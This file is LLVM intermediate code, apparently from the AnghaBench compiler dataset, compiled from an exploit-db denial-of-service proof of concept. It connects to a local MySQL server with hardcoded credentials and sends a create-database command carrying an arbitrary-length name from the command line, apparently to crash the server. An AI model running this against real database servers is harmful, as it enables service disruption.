; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/linux/dos/extr_33077.c_main.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/linux/dos/extr_33077.c_main.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [27 x i8] c"Init faild, out of memory?\00", align 1
@EXIT_FAILURE = common dso_local global i32 0, align 4
@.str.1 = private unnamed_addr constant [10 x i8] c"localhost\00", align 1
@.str.2 = private unnamed_addr constant [6 x i8] c"monty\00", align 1
@.str.3 = private unnamed_addr constant [12 x i8] c"montypython\00", align 1
@CLIENT_FOUND_ROWS = common dso_local global i32 0, align 4
@.str.4 = private unnamed_addr constant [16 x i8] c"Connect failed\0A\00", align 1
@.str.5 = private unnamed_addr constant [12 x i8] c"Connect OK\0A\00", align 1
@COM_CREATE_DB = common dso_local global i32 0, align 4
@EXIT_SUCCESS = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @main(i32 %0, i8** %1) #0 {
  %3 = alloca i32, align 4
  %4 = alloca i32, align 4
  %5 = alloca i8**, align 8
  %6 = alloca i32*, align 8
  store i32 0, i32* %3, align 4
  store i32 %0, i32* %4, align 4
  store i8** %1, i8*** %5, align 8
  store i32* null, i32** %6, align 8
  %7 = load i32*, i32** %6, align 8
  %8 = call i32* @mysql_init(i32* %7)
  store i32* %8, i32** %6, align 8
  %9 = load i32*, i32** %6, align 8
  %10 = icmp ne i32* %9, null
  br i1 %10, label %14, label %11

11:                                               ; preds = %2
  %12 = call i32 @puts(i8* getelementptr inbounds ([27 x i8], [27 x i8]* @.str, i64 0, i64 0))
  %13 = load i32, i32* @EXIT_FAILURE, align 4
  store i32 %13, i32* %3, align 4
  br label %37

14:                                               ; preds = %2
  %15 = load i32*, i32** %6, align 8
  %16 = load i32, i32* @CLIENT_FOUND_ROWS, align 4
  %17 = call i32 @mysql_real_connect(i32* %15, i8* getelementptr inbounds ([10 x i8], [10 x i8]* @.str.1, i64 0, i64 0), i8* getelementptr inbounds ([6 x i8], [6 x i8]* @.str.2, i64 0, i64 0), i8* getelementptr inbounds ([12 x i8], [12 x i8]* @.str.3, i64 0, i64 0), i32* null, i32 0, i32* null, i32 %16)
  %18 = icmp ne i32 %17, 0
  br i1 %18, label %21, label %19

19:                                               ; preds = %14
  %20 = call i32 @puts(i8* getelementptr inbounds ([16 x i8], [16 x i8]* @.str.4, i64 0, i64 0))
  br label %33

21:                                               ; preds = %14
  %22 = call i32 @puts(i8* getelementptr inbounds ([12 x i8], [12 x i8]* @.str.5, i64 0, i64 0))
  %23 = load i32*, i32** %6, align 8
  %24 = load i32, i32* @COM_CREATE_DB, align 4
  %25 = load i8**, i8*** %5, align 8
  %26 = getelementptr inbounds i8*, i8** %25, i64 1
  %27 = load i8*, i8** %26, align 8
  %28 = load i8**, i8*** %5, align 8
  %29 = getelementptr inbounds i8*, i8** %28, i64 1
  %30 = load i8*, i8** %29, align 8
  %31 = call i32 @strlen(i8* %30)
  %32 = call i32 @simple_command(i32* %23, i32 %24, i8* %27, i32 %31, i32 0)
  br label %33

33:                                               ; preds = %21, %19
  %34 = load i32*, i32** %6, align 8
  %35 = call i32 @mysql_close(i32* %34)
  %36 = load i32, i32* @EXIT_SUCCESS, align 4
  store i32 %36, i32* %3, align 4
  br label %37

37:                                               ; preds = %33, %11
  %38 = load i32, i32* %3, align 4
  ret i32 %38
}

declare dso_local i32* @mysql_init(i32*) #1

declare dso_local i32 @puts(i8*) #1

declare dso_local i32 @mysql_real_connect(i32*, i8*, i8*, i8*, i32*, i32, i32*, i32) #1

declare dso_local i32 @simple_command(i32*, i32, i8*, i32, i32) #1

declare dso_local i32 @strlen(i8*) #1

declare dso_local i32 @mysql_close(i32*) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
